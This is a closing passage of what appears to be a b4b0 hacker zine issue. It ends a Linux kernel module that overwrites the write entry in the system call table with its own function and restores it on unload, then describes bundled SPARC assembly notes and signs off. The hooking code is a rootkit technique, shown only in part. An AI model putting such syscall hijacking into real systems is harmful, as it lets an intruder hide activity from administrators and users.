* to the mem addr of write.
*/
sys_call_table[SYS_write]=(void *)hihi; /* replace it with our
return 0; * new addr to our code
*/
}
void cleanup_module(void)
{
sys_call_table[SYS_write]=(void *)wwrite; /* have it point back to
* orignal addr.
*/
}
[compiled d0x on sparc asm (various)] - -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
Included in the .tgz is the directory sparc_asm/. The *class*.html files
were taken from some colleges web site =) greetz to the professor who
wrote them... The other thing is info on the sparc stack... reading both
these things will gib u a working knowledge of sparc asm ! there is no
excuse not to read all these filez right now !
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
**************************************************************************
**************************************************************************
**************************************************************************
THATS ALL
THANK U
FOR READING
B4B0
!!!!!!!!!!!!!!!!!!!!!!!!!! PLEASE
COME
AGAIN
Reference in a new issue View git blame Copy permalink